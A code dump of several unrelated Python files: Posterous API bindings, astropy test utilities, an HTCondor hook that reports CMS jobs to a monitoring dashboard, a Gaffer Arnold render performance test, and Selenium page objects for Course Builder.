own the comment. Optionally, a name and email may be
provided to create an anonymous comment; only the site
owner can do this.
"""
new_comment = bind_method(
path = 'newcomment',
method = 'POST',
payload_type = 'comment',
allowed_param = [
('post_id', int),
('comment', basestring),
('name', basestring),
('email', basestring),
('date', datetime)],
require_auth = True
)
## Twitter
"""
Allows the posting of media to Posterous using Twitter
credentials. Username and password are required params.
If the Twitter user is registered on Posterous, it will
post to their default site. If not registered, Posterous
will create a new site for them.
The media param must be set to file data. If posting
multiple files, provide a list of file data.
Returns a JSON object with the post id and post url.
"""
twitter_upload = bind_method(
path = 'upload',
method = 'POST',
payload_type = 'json',
response_type = 'json',
allowed_params = [
('username', basestring),
('password', basestring),
('media', (basestring, list)),
('message', basestring),
('body', basestring),
('source', basestring),
('sourceLink', basestring)]
)
"""
Has the same functionality of 'twitter_upload', while
also tweeting the message with a link.
"""
twitter_upload_and_post = bind_method(
path = 'uploadAndPost',
method = 'POST',
payload_type = 'json',
response_type = 'json',
allowed_params = [
('username', basestring),
('password', basestring),
('media', (basestring, list)),
('message', basestring),
('body', basestring),
('source', basestring),
('sourceLink', basestring)]
)
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides the tools used to internally run the astropy test suite
from the installed astropy. It makes use of the `pytest` testing framework.
"""
import os
import sys
import types
import pickle
import warnings
import functools
import pytest
try:
# Import pkg_resources to prevent it from issuing warnings upon being
# imported from within pytest. See
# https://github.com/astropy/astropy/pull/537 for a detailed explanation.
import pkg_resources # pylint: disable=W0611 # noqa
except ImportError:
pass
from astropy.units import allclose as quantity_allclose # noqa
from astropy.utils.exceptions import (AstropyDeprecationWarning,
AstropyPendingDeprecationWarning)
# For backward-compatibility with affiliated packages
from .runner import TestRunner # pylint: disable=W0611 # noqa
__all__ = ['raises', 'enable_deprecations_as_exceptions', 'remote_data',
'treat_deprecations_as_exceptions', 'catch_warnings',
'assert_follows_unicode_guidelines',
'assert_quantity_allclose', 'check_pickling_recovery',
'pickle_protocol', 'generic_recursive_equality_test']
# pytest marker to mark tests which get data from the web
# This is being maintained for backwards compatibility
remote_data = pytest.mark.remote_data
# distutils expects options to be Unicode strings
def _fix_user_options(options):
def to_str_or_none(x):
if x is None:
return None
return str(x)
return [tuple(to_str_or_none(x) for x in y) for y in options]
def _save_coverage(cov, result, rootdir, testing_path):
"""
This method is called after the tests have been run in coverage mode
to cleanup and then save the coverage data and report.
"""
from astropy.utils.console import color_print
if result != 0:
return
# The coverage report includes the full path to the temporary
# directory, so we replace all the paths with the true source
# path. Note that this will not work properly for packages that still
# rely on 2to3.
try:
# Coverage 4.0: _harvest_data has been renamed to get_data, the
# lines dict is private
cov.get_data()
except AttributeError:
# Coverage < 4.0
cov._harvest_data()
lines = cov.data.lines
else:
lines = cov.data._lines
for key in list(lines.keys()):
new_path = os.path.relpath(
os.path.realpath(key),
os.path.realpath(testing_path))
new_path = os.path.abspath(
os.path.join(rootdir, new_path))
lines[new_path] = lines.pop(key)
color_print('Saving coverage data in .coverage...', 'green')
cov.save()
color_print('Saving HTML coverage report in htmlcov...', 'green')
cov.html_report(directory=os.path.join(rootdir, 'htmlcov'))
# TODO: Plan a roadmap of deprecation as pytest.raises has matured over the years.
# See https://github.com/astropy/astropy/issues/6761
class raises:
"""
A decorator to mark that a test should raise a given exception.
Use as follows::
@raises(ZeroDivisionError)
def test_foo():
x = 1/0
This can also be used a context manager, in which case it is just
an alias for the ``pytest.raises`` context manager (because the
two have the same name this help avoid confusion by being
flexible).
.. note:: Usage of ``pytest.raises`` is preferred.
"""
# pep-8 naming exception -- this is a decorator class
def __init__(self, exc):
self._exc = exc
self._ctx = None
def __call__(self, func):
@functools.wraps(func)
def run_raises_test(*args, **kwargs):
pytest.raises(self._exc, func, *args, **kwargs)
return run_raises_test
def __enter__(self):
self._ctx = pytest.raises(self._exc)
return self._ctx.__enter__()
def __exit__(self, *exc_info):
return self._ctx.__exit__(*exc_info)
_deprecations_as_exceptions = False
_include_astropy_deprecations = True
_modules_to_ignore_on_import = set([
r'compiler', # A deprecated stdlib module used by pytest
r'scipy',
r'pygments',
r'ipykernel',
r'IPython', # deprecation warnings for async and await
r'setuptools'])
_warnings_to_ignore_entire_module = set([])
_warnings_to_ignore_by_pyver = {
None: set([ # Python version agnostic
# https://github.com/astropy/astropy/pull/7372
(r"Importing from numpy\.testing\.decorators is deprecated, "
r"import from numpy\.testing instead\.", DeprecationWarning),
# inspect raises this slightly different warning on Python 3.7.
# Keeping it since e.g. lxml as of 3.8.0 is still calling getargspec()
(r"inspect\.getargspec\(\) is deprecated, use "
r"inspect\.signature\(\) or inspect\.getfullargspec\(\)",
DeprecationWarning),
# https://github.com/astropy/pytest-doctestplus/issues/29
(r"split\(\) requires a non-empty pattern match", FutureWarning),
# Package resolution warning that we can do nothing about
(r"can't resolve package from __spec__ or __package__, "
r"falling back on __name__ and __path__", ImportWarning)]),
(3, 7): set([
# Deprecation warning for collections.abc, fixed in Astropy but still
# used in lxml, and maybe others
(r"Using or importing the ABCs from 'collections'",
DeprecationWarning)])
}
def enable_deprecations_as_exceptions(include_astropy_deprecations=True,
modules_to_ignore_on_import=[],
warnings_to_ignore_entire_module=[],
warnings_to_ignore_by_pyver={}):
"""
Turn on the feature that turns deprecations into exceptions.
Parameters
----------
include_astropy_deprecations : bool
If set to `True`, ``AstropyDeprecationWarning`` and
``AstropyPendingDeprecationWarning`` are also turned into exceptions.
modules_to_ignore_on_import : list of str
List of additional modules that generate deprecation warnings
on import, which are to be ignored. By default, these are already
included: ``compiler``, ``scipy``, ``pygments``, ``ipykernel``, and
``setuptools``.
warnings_to_ignore_entire_module : list of str
List of modules with deprecation warnings to ignore completely,
not just during import. If ``include_astropy_deprecations=True``
is given, ``AstropyDeprecationWarning`` and
``AstropyPendingDeprecationWarning`` are also ignored for the modules.
warnings_to_ignore_by_pyver : dict
Dictionary mapping tuple of ``(major, minor)`` Python version to
a list of ``(warning_message, warning_class)`` to ignore.
Python version-agnostic warnings should be mapped to `None` key.
This is in addition of those already ignored by default
(see ``_warnings_to_ignore_by_pyver`` values).
"""
global _deprecations_as_exceptions
_deprecations_as_exceptions = True
global _include_astropy_deprecations
_include_astropy_deprecations = include_astropy_deprecations
global _modules_to_ignore_on_import
_modules_to_ignore_on_import.update(modules_to_ignore_on_import)
global _warnings_to_ignore_entire_module
_warnings_to_ignore_entire_module.update(warnings_to_ignore_entire_module)
global _warnings_to_ignore_by_pyver
for key, val in warnings_to_ignore_by_pyver.items():
if key in _warnings_to_ignore_by_pyver:
_warnings_to_ignore_by_pyver[key].update(val)
else:
_warnings_to_ignore_by_pyver[key] = set(val)
def treat_deprecations_as_exceptions():
"""
Turn all DeprecationWarnings (which indicate deprecated uses of
Python itself or Numpy, but not within Astropy, where we use our
own deprecation warning class) into exceptions so that we find
out about them early.
This completely resets the warning filters and any "already seen"
warning state.
"""
# First, totally reset the warning state. The modules may change during
# this iteration thus we copy the original state to a list to iterate
# on. See https://github.com/astropy/astropy/pull/5513.
for module in list(sys.modules.values()):
# We don't want to deal with six.MovedModules, only "real"
# modules. FIXME: we no more use six, this should be useless ?
if (isinstance(module, types.ModuleType) and
hasattr(module, '__warningregistry__')):
del module.__warningregistry__
if not _deprecations_as_exceptions:
return
warnings.resetwarnings()
# Hide the next couple of DeprecationWarnings
warnings.simplefilter('ignore', DeprecationWarning)
# Here's the wrinkle: a couple of our third-party dependencies
# (pytest and scipy) are still using deprecated features
# themselves, and we'd like to ignore those. Fortunately, those
# show up only at import time, so if we import those things *now*,
# before we turn the warnings into exceptions, we're golden.
for m in _modules_to_ignore_on_import:
try:
__import__(m)
except ImportError:
pass
# Now, start over again with the warning filters
warnings.resetwarnings()
# Now, turn these warnings into exceptions
_all_warns = [DeprecationWarning, FutureWarning, ImportWarning]
# Only turn astropy deprecation warnings into exceptions if requested
if _include_astropy_deprecations:
_all_warns += [AstropyDeprecationWarning,
AstropyPendingDeprecationWarning]
for w in _all_warns:
warnings.filterwarnings("error", ".*", w)
# This ignores all specified warnings from given module(s),
# not just on import, for use of Astropy affiliated packages.
for m in _warnings_to_ignore_entire_module:
for w in _all_warns:
warnings.filterwarnings('ignore', category=w, module=m)
# This ignores only specified warnings by Python version, if applicable.
for v in _warnings_to_ignore_by_pyver:
if v is None or sys.version_info[:2] == v:
for s in _warnings_to_ignore_by_pyver[v]:
warnings.filterwarnings("ignore", s[0], s[1])
# If using Matplotlib < 3, we should ignore the following warning since
# this is beyond our control
try:
import matplotlib
except ImportError:
pass
else:
if matplotlib.__version__[0] < '3':
warnings.filterwarnings('ignore', category=DeprecationWarning,
module='numpy.lib.type_check')
# TODO: Plan a roadmap of deprecation as pytest.warns has matured over the years.
# See https://github.com/astropy/astropy/issues/6761
class catch_warnings(warnings.catch_warnings):
"""
A high-powered version of warnings.catch_warnings to use for testing
and to make sure that there is no dependence on the order in which
the tests are run.
This completely blitzes any memory of any warnings that have
appeared before so that all warnings will be caught and displayed.
``*args`` is a set of warning classes to collect. If no arguments are
provided, all warnings are collected.
Use as follows::
with catch_warnings(MyCustomWarning) as w:
do.something.bad()
assert len(w) > 0
.. note:: Usage of :ref:`pytest.warns <pytest:warns>` is preferred.
"""
def __init__(self, *classes):
super().__init__(record=True)
self.classes = classes
def __enter__(self):
warning_list = super().__enter__()
treat_deprecations_as_exceptions()
if len(self.classes) == 0:
warnings.simplefilter('always')
else:
warnings.simplefilter('ignore')
for cls in self.classes:
warnings.simplefilter('always', cls)
return warning_list
def __exit__(self, type, value, traceback):
treat_deprecations_as_exceptions()
class ignore_warnings(catch_warnings):
"""
This can be used either as a context manager or function decorator to
ignore all warnings that occur within a function or block of code.
An optional category option can be supplied to only ignore warnings of a
certain category or categories (if a list is provided).
"""
def __init__(self, category=None):
super().__init__()
if isinstance(category, type) and issubclass(category, Warning):
self.category = [category]
else:
self.category = category
def __call__(self, func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# Originally this just reused self, but that doesn't work if the
# function is called more than once so we need to make a new
# context manager instance for each call
with self.__class__(category=self.category):
return func(*args, **kwargs)
return wrapper
def __enter__(self):
retval = super().__enter__()
if self.category is not None:
for category in self.category:
warnings.simplefilter('ignore', category)
else:
warnings.simplefilter('ignore')
return retval
def assert_follows_unicode_guidelines(
x, roundtrip=None):
"""
Test that an object follows our Unicode policy. See
"Unicode guidelines" in the coding guidelines.
Parameters
----------
x : object
The instance to test
roundtrip : module, optional
When provided, this namespace will be used to evaluate
``repr(x)`` and ensure that it roundtrips. It will also
ensure that ``__bytes__(x)`` roundtrip.
If not provided, no roundtrip testing will be performed.
"""
from astropy import conf
with conf.set_temp('unicode_output', False):
bytes_x = bytes(x)
unicode_x = str(x)
repr_x = repr(x)
assert isinstance(bytes_x, bytes)
bytes_x.decode('ascii')
assert isinstance(unicode_x, str)
unicode_x.encode('ascii')
assert isinstance(repr_x, str)
if isinstance(repr_x, bytes):
repr_x.decode('ascii')
else:
repr_x.encode('ascii')
if roundtrip is not None:
assert x.__class__(bytes_x) == x
assert x.__class__(unicode_x) == x
assert eval(repr_x, roundtrip) == x
with conf.set_temp('unicode_output', True):
bytes_x = bytes(x)
unicode_x = str(x)
repr_x = repr(x)
assert isinstance(bytes_x, bytes)
bytes_x.decode('ascii')
assert isinstance(unicode_x, str)
assert isinstance(repr_x, str)
if isinstance(repr_x, bytes):
repr_x.decode('ascii')
else:
repr_x.encode('ascii')
if roundtrip is not None:
assert x.__class__(bytes_x) == x
assert x.__class__(unicode_x) == x
assert eval(repr_x, roundtrip) == x
@pytest.fixture(params=[0, 1, -1])
def pickle_protocol(request):
"""
Fixture to run all the tests for protocols 0 and 1, and -1 (most advanced).
(Originally from astropy.table.tests.test_pickle)
"""
return request.param
def generic_recursive_equality_test(a, b, class_history):
"""
Check if the attributes of a and b are equal. Then,
check if the attributes of the attributes are equal.
"""
dict_a = a.__dict__
dict_b = b.__dict__
for key in dict_a:
assert key in dict_b,\
f"Did not pickle {key}"
if hasattr(dict_a[key], '__eq__'):
eq = (dict_a[key] == dict_b[key])
if '__iter__' in dir(eq):
eq = (False not in eq)
assert eq, f"Value of {key} changed by pickling"
if hasattr(dict_a[key], '__dict__'):
if dict_a[key].__class__ in class_history:
# attempt to prevent infinite recursion
pass
else:
new_class_history = [dict_a[key].__class__]
new_class_history.extend(class_history)
generic_recursive_equality_test(dict_a[key],
dict_b[key],
new_class_history)
def check_pickling_recovery(original, protocol):
"""
Try to pickle an object. If successful, make sure
the object's attributes survived pickling and unpickling.
"""
f = pickle.dumps(original, protocol=protocol)
unpickled = pickle.loads(f)
class_history = [original.__class__]
generic_recursive_equality_test(original, unpickled,
class_history)
def assert_quantity_allclose(actual, desired, rtol=1.e-7, atol=None,
**kwargs):
"""
Raise an assertion if two objects are not equal up to desired tolerance.
This is a :class:`~astropy.units.Quantity`-aware version of
:func:`numpy.testing.assert_allclose`.
"""
import numpy as np
from astropy.units.quantity import _unquantify_allclose_arguments
np.testing.assert_allclose(*_unquantify_allclose_arguments(
actual, desired, rtol, atol), **kwargs)
|
|
import os
import sys
import datetime
from hashlib import sha1
import subprocess
import getpass
import htcondor
import re
sys.path.insert(0, '/cvmfs/cms.cern.ch/crab/CRAB_2_11_1_patch1/python/')
from DashboardAPI import apmonSend, apmonFree
# import DashboardAPI
# DashboardAPI.apmonLoggingLevel = "DEBUG"
class cmsdashboard(hook):
debug = True
def options(self, *args, **kwargs):
self.use_dashboard = True
if args:
# command line args are only the first argument to this function
clargs = list(args[0])
nargs = []
for arg in clargs:
if arg == '--disable-dashboard':
self.use_dashboard = False
continue
nargs.append(arg)
# Replace elements of the original arg list. The [:] is
# important. (This is a bit of a cheat around the fact
# that we can't return args from the hook.)
args[0][:] = nargs
def presubmit(self, job, *args, **kwargs):
reporter = CMSReporter(job.files[0])
class CMSReporter(object):
def __init__(self, submitfile):
self._submitfile = submitfile
self._cancel_report = False
self._wrapper = '/home/khurtado/CMSConnect/dashboard/connect_wrapper.py'
# Create and register monitor
self._taskid = self._get_taskid(str(submitfile))
self.monitor = Monitor(self._taskid)
def _preppend_to_item_values(self, sub, key, value, separator=' '):
'''Search for all coincidences of a key in the submit class
and preppend 'value' to its contents.
'''
index = 0
for item in sub:
if key.lower() in item[0].lower():
item = (item[0], '{0}{1}{2}'.format(value, separator, item[1]))
list.__setitem__(sub, index, item)
index += 1
def _search_key_values(self, sub, key):
'''Search for all coincidences of a key in the submit class.
Returns a list with each key position
'''
index = 0
key_map = []
for item in sub:
if key.lower() in item[0].lower():
key_map.append(index)
index += 1
return key_map
def _split_by_exe_blocks(self, sub):
# Ignore first executable position
blocks = [0] + self._search_key_values(sub, 'executable')[1:] + [len(sub)]
sublists = []
for i in range(len(blocks) - 1):
sublists += [sub[blocks[i]:blocks[i + 1]]]
return sublists
def _modify_exe_args(self, sub):
'''Return a copy of a modified submit object. Modifications are:
-Replace 'Executables' for 'connect_wrapper.py'
-Preppend the original executable to arguments
-Create one if there are no arguments
-Add executable to transfer_input_files
-Create one if there is no such attribute
-Do this per executable block
'''
newsub = sub.__class__()
latest_transfer_input_files = ''
for sublist in self._split_by_exe_blocks(sub):
sublist = sub.__class__(sublist)
Executable = True if 'executable' in sublist else False
if Executable:
exe_index = int(sublist.index(sublist['executable']))
exe_cmd = sublist['executable'][1]
sublist['executable'] = self._wrapper
# Update arguments
if 'arguments' in sublist:
self._preppend_to_item_values(sublist, 'arguments', exe_cmd)
else:
# sublist['arguments'] = exe_cmd
sublist.insert(exe_index + 1, ('Arguments', exe_cmd))
# Update transfer_input_files
if 'transfer_input_files' in sublist:
latest_transfer_input_files = sublist['transfer_input_files'][1]
self._preppend_to_item_values(sublist, 'transfer_input_files', exe_cmd, ',')
else:
if latest_transfer_input_files:
sublist.insert(exe_index + 1,
('transfer_input_files', '{0},{1}'.format(exe_cmd, latest_transfer_input_files)))
else:
sublist.insert(exe_index + 1, ('transfer_input_files', exe_cmd))
newsub.extend(sublist)
newsub.update()
return newsub
def _get_taskid(self, jdl_name):
filename = os.path.splitext(jdl_name)[0]
taskid = 'cmsconnect_{0}_{1}_{2}'.format(getpass.getuser(), filename,
sha1(str(datetime.datetime.utcnow())).hexdigest()[-16:])
return taskid
def _cluster_jobs(self, output):
cluster_jobs = []
cluster_re = re.compile(r'(\d+) job\(s\) submitted to cluster (\d+)\.')
for line in output.split("\n"):
match = cluster_re.match(line)
if match:
cluster_jobs.append((match.group(2), match.group(1)))
return cluster_jobs
def report_jobs(self, condor_output):
if self._cancel_report:
return
clusters = self._cluster_jobs(condor_output)
if not clusters:
print "Warning: Could not extract clusters and jobs submitted information."
return
jobs_previous = 0
schedd = htcondor.Schedd()
for cluster, jobs in clusters:
for procid in range(int(jobs)):
new_id = str(int(jobs_previous) + int(procid))
schedd.edit(['{0}.{1}'.format(cluster, procid)], 'Dashboard_Id', new_id)
schedd.edit(['{0}.{1}'.format(cluster, procid)], 'Environment',
"\"{0} Dashboard_Id='{1}'\"".format(self.monitor.environment, new_id))
jobs_previous += int(jobs)
# Report jobs
njobs = jobs_previous
for id in range(0, int(njobs)):
self.monitor.register_job(str(id))
self.monitor.free()
for id in range(0, int(njobs)):
self.monitor.update_job(str(id), 'Pending')
return
def cms_dashboard_report(self, sub, classads, nargs):
''' - Register jobs to monitor(s).
- One monitor per Executable
- Add dashboard parameters to Classads and SHELL environment.
- Preppend dashboard wrapper before executable for the worker node.
Inputs:
-sub: This is the submit jdl file interpreted by the condor_submit::submit
class and passed as an object.
-submitfile: Is the condor submit filename.
-classads: Condor ClassAds to modify.
-nargs: Arguments parsed to condor from condor_submit wrapper.
'''
original_sub = sub
sub = sub.__class__(self._modify_exe_args(sub))
if sub:
sub.update()
else:
print """Warning: Could not append dashboard wrapper to submit file.
Stop CMS dashboard reporting"""
self._cancel_report = True
return original_sub
# Create and register monitor
self.monitor.set_executable(sub['executable'][1])
self.monitor.register_run()
dashboard_monitorid, dashboard_syncid = self.monitor.generate_ids('MetaID')
dashboard_parameters = [("Dashboard_taskid", self._taskid),
("Dashboard_monitorid", dashboard_monitorid),
("Dashboard_syncid", dashboard_syncid),
]
classads += dashboard_parameters
# Add dashboard paramenters to the SHELL environment
envpars = ' '.join("{0}='{1}'".format(ad, value) for ad, value in dashboard_parameters)
# envpars += ' Dashboard_Id=$(Process)'
nargs += ['-a', '+environment="{0}"'.format(envpars)]
self.monitor.environment = envpars
return sub
class Monitor(object):
def __init__(self, taskid):
self._taskid = taskid
p = subprocess.Popen(["voms-proxy-info", "-identity"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
id, err = p.communicate()
id = id.strip()
self.__fullname = id.rsplit('/CN=', 1)[1]
self.__username = u'unknown'
self.__cmssw_version = "unknown"
# self.__executable = "unknown"
self.__executable = "unknown"
def generate_ids(self, jobid):
monitorid = '{0}_{1}/{0}'.format(jobid,
'https://login.uscms.org/{0}'.format(sha1(self._taskid).hexdigest()[-16:]))
syncid = 'https://login.uscms.org//{0}//12345.{1}'.format(self._taskid, jobid)
return monitorid, syncid
def free(self):
apmonFree()
def register_run(self):
apmonSend(self._taskid, 'TaskMeta', {
'taskId': self._taskid,
'jobId': 'TaskMeta',
'tool': 'cmsconnect',
'tool_ui': os.environ.get('HOSTNAME', ''),
'SubmissionType': 'direct',
'JSToolVersion': '3.2.1',
'scheduler': 'condor',
'GridName': '/CN=' + self.__fullname,
'ApplicationVersion': self.__cmssw_version,
'taskType': 'analysis',
'vo': 'cms',
'user': self.__username,
'CMSUser': self.__username,
'datasetFull': '',
'resubmitter': 'user',
'exe': self.__executable
})
self.free()
def register_job(self, id):
monitorid, syncid = self.generate_ids(id)
apmonSend(self._taskid, monitorid, {
'taskId': self._taskid,
'jobId': monitorid,
'sid': syncid,
'broker': 'condor',
'bossId': str(id),
'SubmissionType': 'Direct',
'TargetSE': 'cmseos.fnal.gov',
'localId': '',
'tool': 'cmsconnect',
'JSToolVersion': '3.2.1',
'tool_ui': os.environ.get('HOSTNAME', ''),
'scheduler': 'condor',
'GridName': '/CN=' + self.__fullname,
'ApplicationVersion': self.__cmssw_version,
'taskType': 'analysis',
'vo': 'cms',
'user': self.__username,
'CMSUser': self.__username,
# 'datasetFull': self.datasetPath,
'resubmitter': 'user',
'exe': self.__executable
})
return monitorid, syncid
def update_job(self, id, status):
monitorid, syncid = self.generate_ids(id)
apmonSend(self._taskid, monitorid, {
'taskId': self._taskid,
'jobId': monitorid,
'sid': syncid,
'StatusValueReason': '',
'StatusValue': status,
'StatusEnterTime':
"{0:%F_%T}".format(datetime.datetime.utcnow()),
'StatusDestination': 'unknown',
'RBname': 'condor'
})
# apmonFree()
def set_executable(self, executable):
self.__executable = executable
@property
def environment(self):
return self._environment
@environment.setter
def environment(self, environ):
self._environment = environ
|
|
##########################################################################
#
# Copyright (c) 2020, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import imath
import math
import os
import unittest
import IECore
import IECoreScene
import Gaffer
import GafferArnold
import GafferImage
import GafferImageUI
import GafferScene
import GafferSceneTest
import GafferTest
import GafferUI
import GafferUITest
import GafferImageTest
from Qt import QtCore
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
class InteractiveArnoldRenderPerformanceTest( GafferUITest.TestCase ) :
# Arnold outputs licensing warnings that would cause failures
failureMessageLevel = IECore.MessageHandler.Level.Error
def runInteractive( self, useUI, useBlur, resolution ):
script = Gaffer.ScriptNode()
script["Camera"] = GafferScene.Camera()
script["Camera"]["transform"]["translate"]["z"].setValue( 6 )
script["Sphere"] = GafferScene.Sphere( "Sphere" )
script["Sphere"]["radius"].setValue( 10 )
script["ImageShader"] = GafferArnold.ArnoldShader()
script["ImageShader"].loadShader( "image" )
script["ImageShader"]["parameters"]["filename"].setValue( "${GAFFER_ROOT}/python/GafferImageTest/images/GafferChecker.exr" )
script["ImageShader"]["parameters"]["sscale"].setValue( 16 )
script["ImageShader"]["parameters"]["tscale"].setValue( 16 )
script["ShaderAssignment"] = GafferScene.ShaderAssignment()
script["ShaderAssignment"]["in"].setInput( script["Sphere"]["out"] )
script["ShaderAssignment"]["shader"].setInput( script["ImageShader"]["out"] )
script["Group"] = GafferScene.Group()
script["Group"]["in"][0].setInput( script["Camera"]["out"] )
script["Group"]["in"][1].setInput( script["ShaderAssignment"]["out"] )
script["StandardOptions"] = GafferScene.StandardOptions()
script["StandardOptions"]["in"].setInput( script["Group"]["out"] )
script["StandardOptions"]["options"]["renderCamera"]["value"].setValue( '/group/camera' )
script["StandardOptions"]["options"]["renderCamera"]["enabled"].setValue( True )
script["StandardOptions"]["options"]["renderResolution"]["value"].setValue( imath.V2i( resolution, resolution ) )
script["StandardOptions"]["options"]["renderResolution"]["enabled"].setValue( True )
script["ArnoldOptions"] = GafferArnold.ArnoldOptions( "ArnoldOptions" )
script["ArnoldOptions"]["in"].setInput( script["StandardOptions"]["out"] )
# Make sure we leave some CPU available for Gaffer
script["ArnoldOptions"]["options"]["threads"]["value"].setValue( -1 )
script["ArnoldOptions"]["options"]["threads"]["enabled"].setValue( True )
script["Outputs"] = GafferScene.Outputs()
script["Outputs"].addOutput(
"beauty",
IECoreScene.Output(
"Interactive/Beauty",
"ieDisplay",
"rgba",
{
"quantize" : IECore.IntVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : 'ClientDisplayDriver',
"displayHost" : 'localhost',
"displayPort" : str( GafferImage.Catalogue.displayDriverServer().portNumber() ),
"remoteDisplayType" : 'GafferImage::GafferDisplayDriver',
"filter" : 'box',
}
)
)
script["Outputs"]["in"].setInput( script["ArnoldOptions"]["out"] )
script["InteractiveArnoldRender"] = GafferArnold.InteractiveArnoldRender()
script["InteractiveArnoldRender"]["in"].setInput( script["Outputs"]["out"] )
script["Catalogue"] = GafferImage.Catalogue( "Catalogue" )
script["Catalogue"]["directory"].setValue( self.temporaryDirectory() + "/catalogues/test" )
script["Blur"] = GafferImage.Blur( "Blur" )
script["Blur"]["in"].setInput( script["Catalogue"]["out"] )
script["Blur"]["radius"]["x"].setValue( 1.0 )
script["Blur"]["radius"]["y"].setValue( 1.0 )
watchNode = script["Blur"] if useBlur else script["Catalogue"]
if useUI:
with GafferUI.Window() as window :
window.setFullScreen( True )
viewer = GafferUI.Viewer( script )
window.setVisible( True )
viewer.setNodeSet( Gaffer.StandardSet( [ watchNode ] ) )
script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Running )
self.waitForIdle( 10 )
viewer.view().viewportGadget().frame( viewer.view().viewportGadget().getPrimaryChild().bound(), imath.V3f( 0, 0, 1 ) )
frameCounter = {'i' : 0}
def testFunc():
frameCounter['i'] += 1
script["Camera"]["transform"]["translate"]["x"].setValue( math.sin( frameCounter['i'] * 0.1 ) )
if frameCounter['i'] >= 50:
GafferUI.EventLoop.mainEventLoop().stop()
timer = QtCore.QTimer()
timer.setInterval( 20 )
timer.timeout.connect( testFunc )
GafferImageUI.ImageGadget.resetTileUpdateCount()
timer.start()
with GafferTest.TestRunner.PerformanceScope() as ps:
GafferUI.EventLoop.mainEventLoop().start()
ps.setNumIterations( GafferImageUI.ImageGadget.tileUpdateCount() )
script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Stopped )
del window, viewer, timer
self.waitForIdle( 10 )
else:
with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as h :
with IECore.CapturingMessageHandler() as mh :
script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Running )
h.waitFor( 2 )
arnoldStartupErrors = mh.messages
tc = Gaffer.ScopedConnection( GafferImageTest.connectProcessTilesToPlugDirtiedSignal( watchNode["out"] ) )
with GafferTest.TestRunner.PerformanceScope() as ps:
with Gaffer.PerformanceMonitor() as m:
for i in range( 250 ):
script["Camera"]["transform"]["translate"]["x"].setValue( math.sin( ( i + 1 ) * 0.1 ) )
h.waitFor( 0.02 )
ps.setNumIterations( m.plugStatistics( watchNode["out"]["channelData"].source() ).computeCount )
script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Stopped )
# NOTE: These tests should be a lot more effective in terms of measuring exact performance
# if the "repeat" parameter is turned up, but I've currently set it to just 1 because:
# * I wanted to minimize the time spent on the UI tests
# * The non-UI tests for a mysterious reason run faster the first time, so adding more repetitions doesn't
# affect the minimum result
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testPerf( self ) :
self.runInteractive( False, False, 2000 )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testPerfWithBlur( self ) :
self.runInteractive( False, True, 1000 )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testUIPerf( self ) :
self.runInteractive( True, False, 2000 )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testUIPerfWithBlur( self ) :
self.runInteractive( True, True, 1000 )
if __name__ == "__main__":
unittest.main()
|
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Page objects used in functional tests for Course Builder."""
__author__ = [
'John Orr (jorr@google.com)'
]
import re
import time
from selenium.common import exceptions
from selenium.webdriver.common import action_chains
from selenium.webdriver.common import by
from selenium.webdriver.common import keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support import select
from selenium.webdriver.support import wait
DEFAULT_TIMEOUT = 15
def get_parent_element(web_element):
return web_element.find_element_by_xpath('..')
class PageObject(object):
"""Superclass to hold shared logic used by page objects."""
def __init__(self, tester):
self._tester = tester
def get(self, url, can_retry=True):
if can_retry:
tries = 10
else:
tries = 1
while tries > 0:
tries -= 1
self._tester.driver.get(url)
if 'The website may be down' in self._tester.driver.page_source:
time.sleep(5)
continue
return
raise exceptions.TimeoutException(
'Timeout waiting for %s page to load', url)
def wait(self, timeout=None):
if timeout is None:
timeout = DEFAULT_TIMEOUT
return wait.WebDriverWait(self._tester.driver, timeout)
